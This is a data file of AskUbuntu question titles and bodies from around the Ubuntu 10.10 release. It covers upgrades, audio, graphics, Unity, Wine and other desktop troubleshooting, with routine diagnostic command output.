5490	changing ppas from lucid to maverick	i recently upgraded to maverick and i have a not so long list of ppas . is there a way to quickly change the distribution from lucid to maverick without using a text editor ?
5495	speech recognition api	is there a speech recognition api for ubuntu/linux ? i have a school project and i need to transform speach to written text . the programming language is n't a problem . i 've tried cmu-sphinx but have n't had much luck with it , meaning it did n't really recognize much of what my defined grammar or it just mixed up words . any help on the matter would be appreciated . i 've also searched google and could n't really find much info .
5500	how to fix audio issues ?	sometimes my audio does not work , it all started happening after i updated to ubuntu 10.10 can someone help me ?
5506	what time does 10.10 come out ?	what time does ubuntu 10.10 come out 10.10 ca n't wait !
5517	wine pollutes `` open with '' application list	the dialog box in question here is the one you get with the context menu option `` open with other applications '' . wine seems to have inserted more than a dozen or so entries for each application i install , which makes it a pain to find the correct application : what can i do to remove the duplicates ? update : neither of the two solutions really work . the bug is interesting , but the symptoms does not match my problem ( i 'm not having problem with uninstalling applications , but rather the things that are inserted after installing them ) , and with the other one , all references to the wine application are removed , which actually makes the problem worse ( although it may be an acceptable solution if nothing else can be found ) . so this is still an open question ; any takers ?
5521	whats the main problem with getting good multiple monitor support in ubuntu ?	i mean what 's keeping ubuntu from being as user-friendly as win7 in that regard . in win7 i can set up my laptops monitors and it remembers everything and undocking works etc etc . what technical problems ( i assume its mostly technical ) are there that are stopping this from happening in ubuntu ? whys an x restart needed ? and please feel free to go into technical details .
5522	which new dell laptops will run ubuntu 10.10 with full hardware compatibility ?	my parent 's laptop is slowly grinding to a halt and they are looking at buying something new . does anybody know which of dell 's current laptop selection would offer full hardware support under ubuntu 10.10 ? any advice or guidance would be appreciated . thanks !
5527	should i use xz or lzma compression ?	i was wondering since in ubuntu 10.10 i have the ability to create both xz and lzma archives . should i switch to xz ? http : //en.wikipedia.org/wiki/xz http : //en.wikipedia.org/wiki/lzma
5533	how to get the mic on the creative x-mod soundcard working correctly ?	well , i have this problem for a while now . when my computer start the mic seem to work but it 's like it 's muted . i have to go to a terminal and type alsamixer -c 1 and then i set up pcm capture source on line and set up it back to mic to get the mic actually working . is there is a way to do this automatically or to solve the problem . i use a special workaround on this card because of the bug # 429642 . my workaround is having this at the end of my /usr/share/pulseaudio/alsa-mixer/profile-sets/default.conf : [ mapping xmod-stereo-out ] device-strings = surround51 : % f description = analog stereo creative xmod channel-map = front-left , front-right paths-output = analog-output analog-output-headphones analog-output-mono analog-output-lfe-on-mono paths-input = analog-input analog-input-mic analog-input-linein analog-input-aux analog-input-video analog-input-tvtuner analog-input-fm analog-input-mic-line priority = 10 maybe the bug come from here , maybe i have to change something . thank you for any help .
5534	installing on toshiba laptop with preinstalled windows 7 and recovery partition	i would like to know if it will be possible to restore windows 7 after removing recovery partition ? i have 2 recovery dvds that i 've created some time ago but i 'm not sure if it 's sufficient to restore whole system . do i need to keep this partition untouched or maybe i can do recovery in any time with just 2 dvds i have ? my laptop is toshiba satellite a500-1fq .
5536	gaming makes my cpu temp & gpu core temp 85c+	why playing games in ubuntu 10.04 using wine makes my cpu temp & gpu core temp 85c+ , also using flash player or browsing sites that use shock-wave flash plug in leads to the same problem `` cpu temp & gpu core temp 85c+ '' . i tried to use lightspark instead of flash player but it still has many bugs . lenovo g550 intel core 2 duo cpu 2.10ghz vga : nvidia geforce g 105m ubuntu 10.04 lts ( 64x )
5537	applications to replace itunes for ipod synchronization ?	i need to synchronise my ipod nano ( 5th generation ) with music and podcasts ( video and audio ) . i can use rhythmbox for music , but does not seem to work with podcast . so , what application can i use to synchronize my podcats ? edit : after a week of fight with my ipod nano , i 've definitively uninstalled banshee and i finally use rhythmbox . why ? because several times my music and podcast list in my ipod have been corrupted ( 3 times the same podcast , podcast in music and music in podcast , wrong covers ... ) i start this new week testing rhythmbox ... . edit 2 : finally found a solution with gpodder , read my answer for details
5539	how to customize ubuntu 10.10 netbook edition gnome panel ?	in 10.10 ubuntu netbook edition the panel is even more locked down than in 10.04 . is it possible to unlock it so that one can add/remove things from it ? will the 10.04 method of unlocking work with 10.10 ?
5551	clean install from ubuntu 10.04 to lubuntu 10.10 without losing data ?	i have the same situation with this one . http : //askubuntu.com/questions/4119/upgrade-from-kubuntu-9-10-to-ubuntu-10-04 . but i am planning to install lubuntu 10.10 via usb on my netbook after the release . i have only one partition ( and do n't have any plans yet to create another partition ) . is it possible to keep the /home folder while installing aside from backing it up to an external drive and do a clean install ?
5558	how can i install minecraft ?	i have tried many tutorials but none of them are clear enough . i have also tried installing it using wine but it wo n't update and wine goes gray and stops working . does anybody know an easy way to install minecraft though the java file without using wine ?
5560	how to close applications like i close tabs in browsers ?	closing a tab in firefox or chrome using the middle-mouse button is , for me , a great feature . how can i make this work with applications in ubuntu and the opened application panel ?
5571	how can i install unity after installing desktop edition ?	i 've just upgraded my ubuntu desktop from 10.04 to 10.10 on my netbook . how can i install ubuntu unity for my notebook ?
5573	disable automatic activation of gnome shell activities on mouse over	i have been searching for a way to disable the `` hot corner '' feature of the activities button in gnome shell . i would prefer it to require a click such that i do n't keep accidentally activating it upon mouse over .
5574	is there a `` hover to click '' feature in gnome taskbar ?	does gnome have a feature that allows me to hover over a window on the taskbar and select it without clicking ? thanks !
5575	docky does n't let me hide the starter	when i try to use docky in maverick , the option in settings to hide the starter for this dock let me untick even though it 's active ? someone has an workaround . where is the configuration file for the docks , perhaps i can switch it in there ?
5586	fail to create new directory/file on automounted windows drive	my windows drives were set to be automatically mounted in ubuntu 8.10 when installed more than one year ago . today i failed to creat a directory on one of the windows drives , which rarely happened before : $ mkdir /windows-d/tmp mkdir : can not create directory `/windows-d/tmp ' : operation not supported same problem after switching to root . i can still read and modify the existing files on the windows drive and but i am not able to create new directory or new file on it . permission info is here , for which i do n't see anything wrong : $ ls -l / | grep `` windows-d '' drwxrwxrwx 1 root root 229376 2010-10-09 17:47 windows-d mounting information about the windows drive is as follows : $ cat /etc/mtab ... /dev/sda5 /windows-d fuseblk rw , nosuid , nodev , allow_other , blksize=4096 0 0 ... $ cat /etc/fstab # < file system > < mount point > < type > < options > < dump > < pass > ... # entry for /dev/sda5 : uuid=bed8573dd856f35f /windows-d ntfs-3g defaults , locale=en_us.utf-8 0 1 ... $ df -h filesystem size used avail use % mounted on ... /dev/sda5 32g 31g 1.2g 97 % /windows-d i was wonder what 's wrong ? thanks and regards ! update : i just rebooted my computer to windows xp , created a new directory on the windows drive then rebooted back to ubuntu which now allow me to create new file and directory on the windows drive . simply rebooting to windows without creating a new directory does not work . does anyone know why ? is there a way to solve the problem without rebooting ? thanks !
5590	will ubuntu and kubuntu both be upgraded ?	i have both kde and gnome installed on my desktop . if i upgrade to 10.10 will both desktops , kde and gnome , be upgraded too ?
5596	how to clean caches in my homedir	my home directory is getting huge ( 100gb plus ) . when backupping it i notices that there are quite some caches there . which important caches are there in my homedir and how should i clean them ? one cache in particular is bothering me , the cache in .gvfs , where a copy of my network harddisk seems to be stored . how do i neatly clear this cache ?
5603	how can i install ubuntu light ?	how can ubuntu light be installed ? or is ubuntu light only available to oem 's ? ?
5609	how to input commands on the live cd mode selection screen	http : //www.ubuntugeek.com/how-to-fix-ubuntu-10-04-lts-lucid-blank-screen-at-startup.html i have the problem in the above answer page and to fix it i need to highlight live mode on the cd/usb and press f6 and then type a command . however when i press f6 i get a selection of options . so how do you input commands on the live cd mode-selection screen as suggested in the above link .
5612	how can i remove the `` deleted items '' , `` applications '' entries from the netbook launcher ?	is it possible to remove the `` deleted items '' , `` applications '' and/or `` files & folders '' entries on the unity dock ( ubuntu 10.10 sidebar ) if they are not needed ? repeating what is done for removing other launcher entries does not seem to work .
5614	is it safe to upgrade glibc to 2.2 ?	i 've been looking at purchasing marbleblast gold from torque and a game called orbz and one of the requirements is glibc2.2+ i 've done a little research around the issue and noticed that ubuntu uses eglibc , and that glibc is still at version 2.11 in a clean install . however given that the c library is a very important part of the operating system i 've been holding off from doing it . is it safe to do so without messing up the os ? and if so how would i go about it ?
5615	upgrade fails because of blcr-dkms	when i try to update my ubuntu 10.04 installation to 10.10 i get the following error . could not calculate the upgrade an unresolvable problem occurred while calculating the upgrade : trying to install blacklisted version 'blcr-dkms_0.8.2-13' this can be caused by : * upgrading to a pre-release version of ubuntu * running the current pre-release version of ubuntu * unofficial software packages not provided by ubuntu if none of this applies , then please report this bug against the 'update-manager ' package and include the files in /var/log/dist-upgrade/ in the bug report . none of the three applies to me ( i think ) . now i found that this also affects someone else : https : //bugs.launchpad.net/update-manager/+bug/657662 is there here someone who knows what could be wrong ? or a workaround so that i can install maverick meerkat ?
5619	problem on boot - login screen freezes	i was so excited and impatient that 's why i could n't wait for ubuntu 10.10 and upgrade to alpha version 2 days ago . now , my login screen freezes and i get a message as `` gnome power manager have not been installed correctly , contact your administrator '' . how should i resolve this ?
5620	live usb not booting in lenovo ideapad s10-3	ubuntu 10.10 live usb not booting in lenovo ideapad s10-3 . i install ubuntu desktop edition in my pen driver using `` startup disk creator '' . but this live usb is not booting on my netbook ( lenovo s10-3 ) .
5623	upgrading to ubuntu 10.10 says it 's still a development release ?	i tried to upgrade from 10.04 to 10.10 - now that ubuntu 10.10 is finally released . i used update-manager -d and the first window after pressing the upgrade button says that it is still a development release . is this true ? or have they not changed this window yet ?
5634	compiling latest gnome-shell	this question pretends to be a central place where people share info about compiling the latest and greatest gnome-shell environment in ubuntu 10.10 . as gnome-shell now depends on gtk3 and in a lot of other new modules , and the gnome-hell ppa is no longer around , it 's actually quite difficult to test it without , as i 've read somewhere , '' compiling half of the gnome desktop '' i 've tried with jhbuild just yesterday and only some modules were built , but gnome-shell and gtk3 were n't included in those that built . as some solutions posted here may seem get quite dangerous , i was thinking about setting up a vm w/ ubuntu 10.10 , and i think that most of you will agree with me . so , in conclusion , questions that need to be answered : is there any new gnome-shell ppa for maverick ? can jhbuild gnome-shell install script be fixed in order to allow a clean build ? if not , any other easy ways to get it , excluding manual compilling ? when installed , will gnome-shell work with virtualbox emulated graphics stack ? ladies and gentleman , the question is now yours . let the answering begin ...
5636	can i see why a package is installed ?	for a specific package , can i find out why it is installed ? so , can i see or it 's manually installed , or that it is installed as a dependency of another package ? or that it is installed as part of the distro ?
5642	where kblocks store the highscore ?	i would like to make a clean install in my computer , but i play a lot of with kblocks ( kde tetris game on gnome ) and if it possible i would like to copy the highscore to the new ( maverick ) system too .
5643	how to add evolution to the messaging menu ?	the item in the messaging menu ( indicator-applet ) related to evolution program disappeared after reinstalling evolution . how to i re-add it back ?
5644	are there widgets available for promoting ubuntu on your site ?	i currently have the maverick countdown widget on my site and was wondering if there are any widgets available now that it 's fully released with which to replace it .
5647	error while upgrading to 10.10	i tried to upgrade 10.04 to 10.10 and got an error : 'e : could n't configure pre-depend x11-common for x11-xkb-utils , probably a dependency cycle. ' . can i fix this and finalize the upgrade ?
5649	backing up third party apps before reinstalling ubuntu	i 'm planning to reinstall my os by not formatting my root partition ( i only use a single partition ) as this will preserve the contents of my home directory , but the problem is that when i 've done it in the past , it 's wiped all my third party applications , and i was wondering if there was a way i could back up and restore them afterwards .
5651	how to improve unity performance ?	i installed ubuntu netbook edition on my netbook* expecting to get the best performance out of it , but apparently , that did n't turn out . unity is a bit slow on it , and when i click on files and folders it takes a while to load the respective interface and the bar at the top disappears and then loads in . is this expected ? is there anything i can do to improve the performance ? is this problem specific to my netbook ? *netbook info : acer - aspire one 1.6 ghz intel atom processor 1 gb ram memory intel gma 950 graphics card
5655	how do i reinstall ubuntu ?	i have ubuntu 10.04 on my computer , with windows 7 next to it . instead of upgrading to 10.10 , i feel like doing a clean install . however , i do n't want to erase my windows , even though i barely ever use it . my question is : how would i remove ubuntu 10.04 from my drive and install ubuntu 10.10 in place , without losing any space or anything , or losing windows 7 ?
5669	how to remove shadow from gnome-panel ?	how can i remove this shadow : from gnome-panel ?
5675	i installed an alpha or beta , am i up to date with the final release if i keep upgrading ?	i installed an ubuntu alpha or beta and have been keeping it up to date . so , should i presume that my system has automatically updated to the next alpha or beta , and will be running the official release when it 's finished ?
5679	software to make a custom live cd ?	i 'm looking for a list of a free easy to use program to create custom live cds i can find something like this ? i 've tried recontructor but it did n't support everything i wanted and it was n't 100 % free . please limit one piece of software per answer and include reasons why you think it 's good .
5687	where can i find a novell netware client for ubuntu ?	i am trying to build a custom version of ubuntu for my school and they seem to be using the novell netware software ( for windows ) so students can log-in to their accounts . i have tried using webdav for the netstorage server but that was unsuccessful . i have also tried a program called novell client for linux but , it did n't fully support ubuntu , it was butt ugly , the latest release was made in 2004 . if you guys could help me out on this i would greatly appreciate it .
5691	is there any way i can get my google chrome to go back a page by pressing backspace ?	something i seem to be missing is when i press backspace the page does n't go back to the last page as it did in windows , does anyone have any ways around this ?
5692	how to remove the icon from notification or any alternative to change wallpaper	i like my desktop to have dynamic wallpaper which change after every few minutes . i use wally to achieve this , no doubt wally is great in its work but one thing that i dont like is the wally icon in the notification area which is useless for me , because once triggered there is no need of any monitoring or any other task to be done anymore because i just want a flawless wallpaper changer . is there a way i can remove wally icon from the notification area or please suggest any other application which does the same work but does not eat the notification area . thanks gaurav butola
5699	can i hide running applications from the unity launcher ?	when running une 10.10 i often have several applications running which on a traditional gnome desktop environment would be running purely in the background and would only be visible from the system tray . good examples would be tomboy when hidden or redshift . unfortunately unity shows a running application in the launcher ( dock ) for these applications even though they already have appindicators visible in the sys tray . is there any way to configure/force unity not to show icons in the dock for certain applications ?
5700	can i install ubuntu software center and indicator-sound from 10.10 on 10.04 ?	i wonder if i can manually install software center and indicator-sound packages from maverick to lucid ? i don´t want to upgrade the whole system , because i´m satisfied with lucid , but it would be nice to have maverick software center and indicator-sound on lucid . i wanted to ask this , because i want to know if i´m going to mess up my system by doing that .
5705	ubuntu 10.10 upgrade results in blank screen after login	after upgrading to 10.10 , i ca n't login anymore . the problem seems be related to graphic card ( computer is lenovo s10e ) and new unity interface . i wonder if anyone have similiar problems and if some solution exists .
5707	how to make rhythmbox use notification area instead of indicator applet	is there a way to install the pre-10.04 style notification thing for rhythmbox and ensure that it does n't show up in the indicator applet ?
5708	unity does not display properly	ubuntu unity on the ubuntu netbook edition installs without a problem but when i log in though , where the panels are , there is just blank area with a shadow effect style thing on it . i can open apps but the window buttons and the global menu are not visable . does this mean that i can not use unity . i 'm running it through wubi on a dell inspiron 1501 laptop . my total ammount of graphics memory is 831mb my dedicated memory is 128mb . the odd thing is is that windows aero displays without a problem so why is there a problem with unity hope this helps ben
5710	boxee with a dual monitor setup spans over two screens in fullscreen	i have two monitors set to twinview in nvidia 's settings . when i run boxee it expands over both of them . is it possible to run it in just one of them ?
5715	5.1 soundcard ( cheap )	i was wondering if anyone can recommend me a 5.1 soundcard that is relatively easy to get working on ubuntu 10.10 the built in sound on the motherboard is giving feedback so i can hear the hard drives spinning and accessing data through the speakers , i assume this would be fixed with a dedicated sound card . my motherboard has pci and pci-e slots available .
5720	if i install ubuntu 10.10 over 10.04 , will all my programs be erased ?	if i want to install 10.10 replacing 10.04 and i select overwrite existing linux distro , will it keep my /home folder and all my settings for programs and such ? if not , what would be a good way to back up all my programs and their data ?
5724	unable to uninstall wine apps	i recently ran the itunes 10 installer in wine and everything seemed to go well . then , when i tried to run it , it would constantly crash/and the appearance would be glitchy . after looking at the wine website , it turns out that itunes 10 has a 'garbage ' rating of wine compatability . now i 'm trying to remove/uninstall itunes , quicktime , and the other applications that come default with installing itunes ( such as bonjour , etc. ) . however , when i run the 'uninstaller ' that wine provides for the programs , it instead executes what appears to actually be the original installer ! i 've tried deleting all the configuration/data files in my wine 's file-system , but to no avail . any help is greatly appreciated ! edit1 : after re-running the uninstall process and then rebooting , the program ( itunes 10 ) still remained installed .
5726	what to do to improve the speed of a laptop with ubuntu ?	i 'm looking for some tricks to improve the performance of my laptop . i 'm using compiz , which makes my ubuntu really nice looking and got some awesome features … but … the startup of many programs is a little bit slow , opening my external harddisk takes 5 to 10 seconds …
5728	what determines which virtual console the graphical interface is run on ?	i 've learned that i can switch between virtual consoles by pressing ctrl+alt+f1âf12 , and i 've found that the graphical interface is usually running at either f7 or f8 . why does this vary , and is there a way to predict it ?
5734	youtube videos are jerky ... ?	lately all my videos are jerky ( using 10.04 ) ... i have a nvidia 5200 card with driver 173 ... all videos are getting worse than when i first loaded 10.04 on my computer ... i do n't understand why ... ? ? ? robert
5735	is there a color scheme for tweetdeck fitting the radiance theme ?	tweetdeck is nice , but it does n't fit to the look of the radiance theme âś
5739	how to reset gnome default theme ?	i wonder and i needed it sometimes . some time we install many themes and it gets worst .
5744	weird sound issues while playing games	i have an hp pavillion dv4-2165dx that has the following specs : 2.13 intel core i3-330m processor 4gb ram intel hd graphics intel 80gb ssd ( newly installed ) ever since i got the laptop , even before i upgraded my hard drive when i play games my volume controls go out of whack . they will jump up and down randomly and uncontrollably until i quit the game , and usually i have to force quit the game because the volume changing will make the game lose focus and just make it hard to do anything . it makes all games unplayable . what is weird is this only happens for games . it does n't happen when i am on my desktop which does the desktop effects by default , and i thought since it 's using the graphics card for rendering it would do that , but maybe desktop effects does n't use the same graphics libraries that games use ? i do n't know . if anyone has any insight to how to solve this problem , it would be greatly appreciated ! everything else works great with the laptop , but this is a show stopper for me .
5745	what 's the equivalent of `` killall gnome-panel '' when using unity ?	sometimes icons do n't draw successfully in the gnome panel and a killall gnome-panel is a good quick fix . is there an equivalent in unity ? i 'm specifically having issues with the dropbox icon .
5746	remote desktop does n't work after upgrade ?	after upgrade ubundu 10.04 to 10.10 , remote desktop does n't work anymore . i 've checked the settings ( vino-preferences ) and everything is ok , but i still ca n't access remotely to the machine ! any solution ?
5748	how to restore windows 7 mbr without a cd	i have been playing with ubuntu for a few weeks now , and i 'd like to revert my computer back to it 's original - factory - defaults . on the computer i have a recovery partition ( it 's a netbook ) . i went through the process of recovery and everything seemed fine . however , when i restart the computer i 'm presented with grub rescue > now , my understanding is that when i installed ubuntu `` side by side '' it replaced the mbr or something like it , with grub . i 've read on a slew of forums , that i need to use a windows recovery disk . here are my issues : a ) i do n't have a recovery disk , i have a recovery partition - it 's a netbook . b ) i do n't have an external cd drive . what i do have is a usb key that has about 1gb of space on it . thanks in advance .
5749	monitor wo n't display at native resolution .	whenever i connect my monitor to my laptop , it wo n't display the video at the native resolution in ubuntu , but my monitor works fine and does both in windows 7 ! in ubuntu it just gives me stripes and the image `` dances , so if i lower the resolution of the monitor , video displays just fine . i 've tried the monitor on my netbook and it works . both the netbook and my laptop i 'm connecting to have an intel `` gma 950 graphics card '' . i 've tried kubuntu , arch linux , mint , and fedora and they all have the same issue , regarding the monitor resolution , whereas it continues to work fine in windows 7 .
5758	built-in network card not working ?	i am new to ubuntu . i have installed ubuntu 9.04 ( jaunty ) . after installation i found that network card is not wokring . and id doest not list in `` system > preferenes > network connections '' so , i got another card from my friend and try to search on internat about my problem but still cant find solution . some commands output is here which may be help to solve problem root @ mzeeshan-desktop : /home/mzeeshan # uname -r 2.6.28-11-generic root @ mzeeshan-desktop : /home/mzeeshan # ifconfig -a eth0 link encap : ethernet hwaddr 00:02:44:4a:45:12 inet addr:192.168.5.37 bcast:192.168.5.255 mask:255.255.255.0 inet6 addr : fe80 : :202:44ff : fe4a:4512/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:3774 errors:0 dropped:0 overruns:0 frame:0 tx packets:3611 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:4307045 ( 4.3 mb ) tx bytes:583067 ( 583.0 kb ) interrupt:22 base address:0x1000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:4 errors:0 dropped:0 overruns:0 frame:0 tx packets:4 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:240 ( 240.0 b ) tx bytes:240 ( 240.0 b ) pan0 link encap : ethernet hwaddr 5e:25:17 : a1:18 : ac broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) root @ mzeeshan-desktop : /home/mzeeshan # lspci 00:00.0 host bridge : intel corporation device 0069 ( rev 12 ) 00:01.0 pci bridge : intel corporation auburndale/havendale pci express x16 root port ( rev 12 ) 00:19.0 ethernet controller : intel corporation device 10f0 ( rev 05 ) 00:1a.0 usb controller : intel corporation ibex peak usb2 enhanced host controller ( rev 05 ) 00:1c.0 pci bridge : intel corporation ibex peak pci express root port 1 ( rev 05 ) 00:1c.4 pci bridge : intel corporation ibex peak pci express root port 5 ( rev 05 ) 00:1c.6 pci bridge : intel corporation ibex peak pci express root port 7 ( rev 05 ) 00:1c.7 pci bridge : intel corporation ibex peak pci express root port 8 ( rev 05 ) 00:1d.0 usb controller : intel corporation ibex peak usb2 enhanced host controller ( rev 05 ) 00:1e.0 pci bridge : intel corporation 82801 pci bridge ( rev a5 ) 00:1f.0 isa bridge : intel corporation ibex peak lpc interface controller ( rev 05 ) 00:1f.2 ide interface : intel corporation ibex peak 4 port sata ide controller ( rev 05 ) 00:1f.3 smbus : intel corporation ibex peak smbus controller ( rev 05 ) 00:1f.5 ide interface : intel corporation ibex peak 2 port sata ide controller ( rev 05 ) 01:00.0 vga compatible controller : nvidia corporation geforce 8400 gs ( rev a1 ) 06:00.0 multimedia audio controller : creative labs sb live ! emu10k1 ( rev 07 ) 06:00.1 input device controller : creative labs sb live ! game port ( rev 07 ) 06:01.0 ethernet controller : realtek semiconductor co. , ltd. rtl-8139/8139c/8139c+ ( rev 10 ) 06:03.0 firewire ( ieee 1394 ) : texas instruments tsb43ab22/a ieee-1394a-2000 controller ( phy/link ) root @ mzeeshan-desktop : /home/mzeeshan # motherboard is intel dp55wg . i do n't know what to do next . any help will be greatly appreciated.. thanks
5760	ubuntu one and 'something has gone wrong '	when i try to login via browser ( chrome , firefox ) to ubuntu one , i get following error : something has gone wrong sorry about that . this problem has been reported to ubuntu one engineers and we 'll fix it as quickly as possible . this may be a temporary problem , so try again in a few minutes . you can also review the current status of ubuntu one which may contain more information about this issue . i can , however , go to machine adding page on ubuntu one . i 'm using only one computer , and it is listed there several times . i tried to delete every entries there and adding my computer once more , but it does n't seem to fix the problem . what blocks connecting my computer to ubuntu one cloud ? it happened ever since i remember . i really wan na use it to store my 100gb stuff , but i just ca n't connect : )
5763	upgrading from the command line ?	i would like to know how to upgrade from my current version of ubuntu to the next stable from the command line interface ?
5776	problems with window previews with compizconfig	i installed compizconfig and activated windows preview , worked fine so far , also the windows previews , now i the window previews are shown anymore , in the menu of compizconfig they are activated but work no longer . already tried to reset the standart-profile in profile and backend . but makes no difference . anybody has an advice what to do to fix it ?
5778	is there a way to control flash video brightness independently , via config file ?	my monitor brightness is reduced because it was causing me headaches . web pages are displayed fine , but flash videos are too dark . i can control gecko-mediaplayer plugin brightness via mplayer config , but i 'm not able to do the same for flash . in windows i was able to do that via nvidia driver settings , which allows to control video overlay brightness independently , but the linux nvidia driver does n't allow to do that .
5780	printers always print pages in reverse order	i have used ubuntu for many years and this has always been a problem for me on every printer i encounter ( hp , lexmark , and samsung , among others ) . whenever i print , the fidelity is fine but instead of printing so that the first page ends up on top of the finished stack , it prints the first page first , then the second page , etc , so that all of the pages are in reverse order . is there a software fix for this ? is anyone else having this problem ?
5786	will the sony walkman nwz-s545 work with ubuntu ?	so i might be getting a new mp3 player and i think that is going to be the sony walkman nwz-s545 . i do n't want to have the same situation with the last mp3 player , which was the shuffle and it did n't have good compatibility with ubuntu so i was wondering if the sony walkman nwz-s545 would work with ubuntu ? thanks . : )
5790	gnome-do in does n't have the docky appearance anymore	i know docky can be installed seperately from gnome-do but i like both and do n't want to install both app when i can install one only . is there a way to get docky back in gnome-do ?
5791	webmin seem to think apache is n't started when it really is , how do i fix this ?	i performed a sudo apt-get install lamp-server^ on my ubuntu 10.10 desktop for development purposes and then installed webmin . now , webmin does n't seem to think apache is running when it really is , and if i try to start apache from the webmin interface i get the following output : failed to start apache : : * starting web server apache2 ... done . also , through webmin , if i try to view the apache error log i get this : cat : /var/log/apache2 $ suffix/error.log : no such file or directory whatever is going on is preventing me from using name-based hosting to view local sites . what is wrong and how do i fix it ?
5793	can two networks be activated on the same physical connection in network-manager ?	i want access to two networks : a pppoe network : for external computers ( www , etc . ) ip ( dhcp ) , dns , default route a lan for access to other local computers ( local file sharing ) ip ( dhcp ) , no dns , only lan route both networks are setup through the same ethernet connection . one way of accessing both networks at the same time is to connect to pppoe from network-manager , and add the lan info by hand : add an ip on eth0 add a route for traffic to that network i can configure two distinct connections in networkmanager , but because both are on the same physical ( ethernet ) network , selecting one of them makes the other one disconnect = > ca n't have both of them at the same time . is there a way to have both of the active simultaneously ?
5794	lost audio after upgrading from 10.04 to 10.10	just did an upgrade on my laptop from 10.04 to 10.10 , and audio does n't work at all anymore . i have the indicator applet , and it seems like everything is working fine . i 've even tried installing several mixers in case something is muted , but nothing is ( and mixers are showing activity as if everything is working fine ) . no application is reporting any errors , they all seem to be playing happily , but no sound comes out . i 've tried reinstalling pulseaudio with -- purge but that did n't help either . ( if you need any logs or command output please let me know in the comments , i do n't know where to look.. ) things tried so far : creating a new user to eliminate any configuration problems creating /etc/asound.conf with these instructions sudo apt-get install libxine1-ffmpeg booted from a live cd ( 10.04 ) to eliminate any hardware problems
5795	will audacious support the sound menu ?	is there any plug-ins already available ? i could n't find any
5800	ubuntu one wo n't allow me to connect or add my computer to sync list	no matter what i do , i ca n't get the ubuntu one client to allow me to add my computer to the sync list in my account . i 've tried reinstalling , deleting config files , etc ... nothing seems to work . when i click on the `` manage account '' link , it just opens my browser and takes to my account page in ubuntu one . it does not ask to add a computer , and if i try to click connect , it does n't do anything , just remains disconnected . anyone know what to do ?
5807	what is the significance of the cmov cpu instruction ?	ubuntu 10.10 has dropped support for i586 and lesser processors , along with i686 processors that do not support the cmov instruction ( conditional move , afaik ) . what is so special about the cmov command ? it even has a flag of its own in the flags : line of /proc/cpuinfo .
5808	old video card problem	i have an old toshiba laptop with a very old graphic card `` trydent cyberaladdin p4 v6.x '' after installing of ubuntu 10.04 , my screen resolution is 800x600 and this is a maximum size ? i can not find a video driver for my video card . can you help me ? thanks
5809	bash does not remember commands	it 's well known that if you push «up» and «down» keys in gnome-terminal , you can move on used commands . it only works for the commands wich are introduced before closing the window . when i close it , gnome-terminal forget all commands . also , i can not paste text w/ ctrl+shift+v .
5811	what is the name of the new ubuntu font ?	i 've upgraded from 10.04 to 10.10 and so much of my preferences are set as they where in 10.04 . i have n't seen much difference in the fonts used by ubuntu , do they have a different name ? which is it ?
5817	cd tray wo n't open . what can i do ?	that 's about it . whenever i press the eject button on my cd player , nothing happens . cd player is not the cause of the problem because this never happens to me under windows . any suggestions ? in addition , running the eject command from a terminal also does nothing . more information : i am running ubuntu 10.04 64 bits , have previously read a cd ( like 2 hours ago ) , which i ejected using nautilus because i could n't eject it using the same hardware button . here is the output of the command 'eject -v ' : eject : using default device `cdrom' eject : device name is `cdrom' eject : expanded name is `/dev/cdrom' eject : `/dev/cdrom ' is a link to `/dev/sr0' eject : `/dev/sr0 ' is not mounted eject : `/dev/sr0 ' is not a mount point eject : `/dev/sr0 ' is not a multipartition device eject : trying to eject `/dev/sr0 ' using cd-rom eject command eject : cd-rom eject command failed eject : trying to eject `/dev/sr0 ' using scsi commands eject : scsi eject succeeded update : ok i would like to add that i am unable to reproduce this bug , as i upgraded to ubuntu 10.10 using said cd , and behavior seems ok now . it was probably the upgrade to a more recent kernel that did the trick . thanks everyone !
5818	i can not seem to get past the `` who are you ? ''	while installing ubuntu 10.10 on my newly partitioned drive - it stops at the login info screen and the `` forward '' button wo n't activate and let me continue . i 'm new to drive partitioning so i 'm fairly sure i goofed up there . the drive partition was unformated , so i was letting the installation do the leg work . pardon me , utterly new to this . any ideas ? or is there a guide i missed ?
5820	why is ubuntu font being used in my browser when it 's not even installed in my pc ?	please excuse my ignorance , i just find it weird . i am on my win7 box . also , only this site renders the font in my browser while design.canonical.com does not . i am pretty sure the latter uses ubuntu font as the default the last time i logged into my ubuntu box .
5825	what does the evolution `` flagged '' column represent ?	i 've only today , started to use evolution . what does evolution 's flagged column indicate ? the flagged column is the third one from the left in the mail window of the default setup . its icon is a red exclamation-mark in a red circle . i find lots of references to the fact that it is a sortable column , but nothing to indicate what its function is . i 've noticed that an un-deleted message ( from the trash ) shows as flagged , but the word `` flagged '' can suggest that something is currently pending ? i 've been experimenting , and now have several flagged messages . i am reluctant to close evolution , until i know exactly what it means . ps . the flagged column is not the same as the flag staus column . the flag status column 's icon is a flag ... the names are confusing , and as i mention in a comment below , i 've been through the help , but have not found a definitive answer . here is a screenshot of the column-headers , and their names ( in the customize dialog ) .
5826	how to keep ubuntu in max performance ?	i try to use the cpu frequency monitor in performance but every time i logout , restar , turn off the machine the configuration change to on demand . how i can keep 'performance ' permanently
5828	is there a way to tell nautilus not to generate previews of pdf files ?	i tend to download lots of articles as pdfs , and i find that when i browse a directory of these nautilus takes 1 minute to load the directory . i assume that 's because it 's generating previews of their front pages . that feature is useless to me , alas . i 'd like to tell it not to do that .
5831	how can i get the latest version of assault cube ?	the one that is currently up is pretty outdated ; i was just curious if one such as myself could update , package then upload it ?
5840	where can i get the source files of the cd label ?	where can i get the source files of this cd label https : //wiki.ubuntu.com/diymarketing # current % 20diymarketing % 20content :
